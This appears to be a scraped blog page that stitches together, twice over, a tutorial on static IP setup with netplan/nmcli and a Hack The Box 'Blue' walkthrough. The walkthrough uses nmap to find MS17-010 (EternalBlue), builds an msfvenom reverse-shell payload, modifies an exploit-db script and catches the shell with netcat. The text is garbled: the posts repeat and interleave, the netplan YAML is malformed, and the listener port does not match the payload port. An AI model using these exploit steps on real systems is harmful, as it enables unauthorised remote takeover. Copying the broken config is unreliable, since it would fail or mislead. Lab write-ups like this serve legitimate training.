# This is the network config written by 'Samdup'
network:
version: 2
renderer: networkd 
ethernets:
enp0s3:
dhcp4: true
enp0s8:
dhcp4: no
dhcp6: no
addresses: [192.168.56.12/24,]
gateway4: 192.168.56.1
nameservers:
addresses: [8.8.8.8, 8.8.4.4

 

sudo netplan apply 

Although there are many benefits of assigning static IP address to a machine, it really helps me to stay organized and can monitor my machines with more convenience. Besides, it became a habit that whenever I have to access machines from Vmware or VirtualBox, I like to SSH to it from my host machine. So, in this article I will share how to set a static IP address to your machine without using any Graphical Tools (because 99.9% of the servers which I had worked have no GUI, moreover I enjoy the power it caters).

Task:

Assign a Static IP address using following information (you can alter it based on your Host-only Network IP address)
IP address: 192.168.56.11
Default Gateway: 192.168.56.1
DNS: 192.168.56.1
Netmask: 255:255:255:0

I ran a ifconfig on my machine. You can clearly see that I have two Network Interface (ifname) slots and one is empty (i.e. ens192) (By the way, you can click on the image to magnify the view)

Command:

First, let’s run

nmcli c s

nmcli is the networking management tool or the package we are going to use (although nmtui is a great option but it may not be available on all the server)

c is the shorthand of connection

s is to show

To know the interface name and other details…

Yes. the above command did help us to confirm our understanding which we inferred from the ifconfig result.

Here we go

nmcli connection add con-name lab ifname ens192 type ethernet autoconnect yes ipv4.addresses 192.168.56.11/24 ipv4.dns 192.168.56.1 ipv4.method manual

Narration:

Although you can understand what each flag does by simple doing a man nmcli , let me do a little explanation just to have a grab of the concept for myself.

We are adding (add) a new connection name (con-name) called lab on the network interface (ifname) ens192, which connects automatically with IP address 192.168.56.11/24 (and netmask 255.255.255.0) using nmcli package.

Method manual means it is a static IP assignment. Until we explicitly change the IP address, it won’t get like how we experience with our home devices (which are on DHCP).

nmcli connection lab up

It appears that the new connection is ready despite we don’t run the aforementioned command, however, I like to run it (because I am afraid it may not be the case in an exam environment or real server that you will have to manage).

To verify the result…

ifconfig

We got IP address and Netmask correct

cat /etc/resolv.conf

We got DNS correct

However, we did get the Gateway configured.

route -n

It is indeed bless in disguise because we got the opportunity to learn how to edit the value in case we need in the future. I know the command is something to do with edit so, let me know quickly run a man nmcli

The above screenshot is nothing but the output of man command.

Method 1

nmcli connection edit type ethernet con-name lab

It will prompt you an interactive shell. You have to choose set option

ipv4.gateway 192.168.56.1

then press q to exit and save.

Method 2  (Referred from this site)

I really like this command more. It’s simple and easy to get the jobs done

nmcli connection modify lab ipv4.gateway 192.168.56.1

To verify:

route -n

Combined output result is in the screenshot

Finally we have to reboot the machine and check whether it is working fine or not.

Yes, everything is working perfect and just to confirm you about the Gateway, I enclosed the result in here.

route -n

 

Today I am going to take down a machine called ‘Blue’. It’s a window 7 based machine. I didn’t expect that I could pwn the machine quite easily… Anyway, here is my walkthrough of it. By the way, it is not necessary mean that it is the sole way to compromise the machine. Ok enough said, let’s do some work…

nmap -sC -sV 10.10.10.40 -o nmap1.log
PORT STATE SERVICE VERSION [6/13]
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
nmap --script smb-vuln* -o smb-vuln.log 10.10.10.40
Nmap scan report for 10.10.10.40 Host is up (0.43s latency). 
Not shown: 991 closed ports PORT STATE SERVICE 
135/tcp open msrpc 139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
49152/tcp open unknown 
49153/tcp open unknown 
49154/tcp open unknown 
49155/tcp open unknown 
49156/tcp open unknown 
49157/tcp open unknown 

Host script results: 
|_smb-vuln-ms10-054: false 
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
| smb-vuln-ms17-010: 
| VULNERABLE: 
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
| State: VULNERABLE 
| IDs: CVE:CVE-2017-0143 
| Risk factor: HIGH 
| A critical remote code execution vulnerability exists in Microsoft SMBv1 
| servers (ms17-010).

After googling, I find this repository has everything you need for MS17-010 (aka eternal blue)

git clone https://github.com/helviojunior/MS17-010.git

cd MS17-010

We need to develop a simple exploit (which could create reverse connection back from Window 7 machine to our Kali Linux machine). Remember, we are never going to depend on Meterpreter shell which is not allowed in the exam therefore, in lieu of aforementioned shell, I am going to use the shell_reverse_tcp shell.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f exe > blue.exe

I don’t think you require me to explain what those option does because I have done it in my previous post. It is here.

Although MS17-010 contains the exploit but I didn’t use that, instead I did manually went to search an exploit from exploit-db

searchsploit MS17-010

cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

Then we need to modify the exploit code. (I have highlighted the line where it is required to modify)

You need to place the guest username (perhaps you can see either from nmap result or following command can help you to understand there is a guest user). By the way, there is a two way to fill the guest user. One is conventional way to place username as guest and other way is simply filling the place by // (yes two forward slashes in between the quote).

Once modification is done then follow the following steps..

I used to divide the Terminal by using tmux and, in one shell you need to wait the reverse connection from the Window Machine.

nc -lvp 1234

And on another shell

python 42315.py 10.10.10.40

Once you are successful, you will get the system32 prompt like the screenshot below..


User flag (remember type in window command is same as cat in Linux – I know this claim is too much but let us be like this for time being)

Finally the root flag…

Task: 
DNS: 192.168.56.1
Gateway: 192.168.56.1
Netmask: 255.255.255.0
IPv4: 192.168.56.12 

sudo vim /etc/netplan/00-installer-config.yaml
# This is the network config written by 'Samdup'
network:
version: 2
renderer: networkd 
ethernets:
enp0s3:
dhcp4: true
enp0s8:
dhcp4: no
dhcp6: no
addresses: [192.168.56.12/24,]
gateway4: 192.168.56.1
nameservers:
addresses: [8.8.8.8, 8.8.4.4

 

sudo netplan apply 

Although there are many benefits of assigning static IP address to a machine, it really helps me to stay organized and can monitor my machines with more convenience. Besides, it became a habit that whenever I have to access machines from Vmware or VirtualBox, I like to SSH to it from my host machine. So, in this article I will share how to set a static IP address to your machine without using any Graphical Tools (because 99.9% of the servers which I had worked have no GUI, moreover I enjoy the power it caters).

Task:

Assign a Static IP address using following information (you can alter it based on your Host-only Network IP address)
IP address: 192.168.56.11
Default Gateway: 192.168.56.1
DNS: 192.168.56.1
Netmask: 255:255:255:0

I ran a ifconfig on my machine. You can clearly see that I have two Network Interface (ifname) slots and one is empty (i.e. ens192) (By the way, you can click on the image to magnify the view)

Command:

First, let’s run

nmcli c s

nmcli is the networking management tool or the package we are going to use (although nmtui is a great option but it may not be available on all the server)

c is the shorthand of connection

s is to show

To know the interface name and other details…

Yes. the above command did help us to confirm our understanding which we inferred from the ifconfig result.

Here we go

nmcli connection add con-name lab ifname ens192 type ethernet autoconnect yes ipv4.addresses 192.168.56.11/24 ipv4.dns 192.168.56.1 ipv4.method manual

Narration:

Although you can understand what each flag does by simple doing a man nmcli , let me do a little explanation just to have a grab of the concept for myself.

We are adding (add) a new connection name (con-name) called lab on the network interface (ifname) ens192, which connects automatically with IP address 192.168.56.11/24 (and netmask 255.255.255.0) using nmcli package.

Method manual means it is a static IP assignment. Until we explicitly change the IP address, it won’t get like how we experience with our home devices (which are on DHCP).

nmcli connection lab up

It appears that the new connection is ready despite we don’t run the aforementioned command, however, I like to run it (because I am afraid it may not be the case in an exam environment or real server that you will have to manage).

To verify the result…

ifconfig

We got IP address and Netmask correct

cat /etc/resolv.conf

We got DNS correct

However, we did get the Gateway configured.

route -n

It is indeed bless in disguise because we got the opportunity to learn how to edit the value in case we need in the future. I know the command is something to do with edit so, let me know quickly run a man nmcli

The above screenshot is nothing but the output of man command.

Method 1

nmcli connection edit type ethernet con-name lab

It will prompt you an interactive shell. You have to choose set option

ipv4.gateway 192.168.56.1

then press q to exit and save.

Method 2  (Referred from this site)

I really like this command more. It’s simple and easy to get the jobs done

nmcli connection modify lab ipv4.gateway 192.168.56.1

To verify:

route -n

Combined output result is in the screenshot

Finally we have to reboot the machine and check whether it is working fine or not.

Yes, everything is working perfect and just to confirm you about the Gateway, I enclosed the result in here.

route -n

 

Today I am going to take down a machine called ‘Blue’. It’s a window 7 based machine. I didn’t expect that I could pwn the machine quite easily… Anyway, here is my walkthrough of it. By the way, it is not necessary mean that it is the sole way to compromise the machine. Ok enough said, let’s do some work…

nmap -sC -sV 10.10.10.40 -o nmap1.log
PORT STATE SERVICE VERSION [6/13]
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
nmap --script smb-vuln* -o smb-vuln.log 10.10.10.40
Nmap scan report for 10.10.10.40 Host is up (0.43s latency). 
Not shown: 991 closed ports PORT STATE SERVICE 
135/tcp open msrpc 139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
49152/tcp open unknown 
49153/tcp open unknown 
49154/tcp open unknown 
49155/tcp open unknown 
49156/tcp open unknown 
49157/tcp open unknown 

Host script results: 
|_smb-vuln-ms10-054: false 
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
| smb-vuln-ms17-010: 
| VULNERABLE: 
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
| State: VULNERABLE 
| IDs: CVE:CVE-2017-0143 
| Risk factor: HIGH 
| A critical remote code execution vulnerability exists in Microsoft SMBv1 
| servers (ms17-010).

After googling, I find this repository has everything you need for MS17-010 (aka eternal blue)

git clone https://github.com/helviojunior/MS17-010.git

cd MS17-010

We need to develop a simple exploit (which could create reverse connection back from Window 7 machine to our Kali Linux machine). Remember, we are never going to depend on Meterpreter shell which is not allowed in the exam therefore, in lieu of aforementioned shell, I am going to use the shell_reverse_tcp shell.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f exe > blue.exe

I don’t think you require me to explain what those option does because I have done it in my previous post. It is here.

Although MS17-010 contains the exploit but I didn’t use that, instead I did manually went to search an exploit from exploit-db

searchsploit MS17-010

cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

Then we need to modify the exploit code. (I have highlighted the line where it is required to modify)

You need to place the guest username (perhaps you can see either from nmap result or following command can help you to understand there is a guest user). By the way, there is a two way to fill the guest user. One is conventional way to place username as guest and other way is simply filling the place by // (yes two forward slashes in between the quote).

Once modification is done then follow the following steps..

I used to divide the Terminal by using tmux and, in one shell you need to wait the reverse connection from the Window Machine.

nc -lvp 1234

And on another shell

python 42315.py 10.10.10.40

Once you are successful, you will get the system32 prompt like the screenshot below..


User flag (remember type in window command is same as cat in Linux – I know this claim is too much but let us be like this for time being)

Finally the root flag…

Menu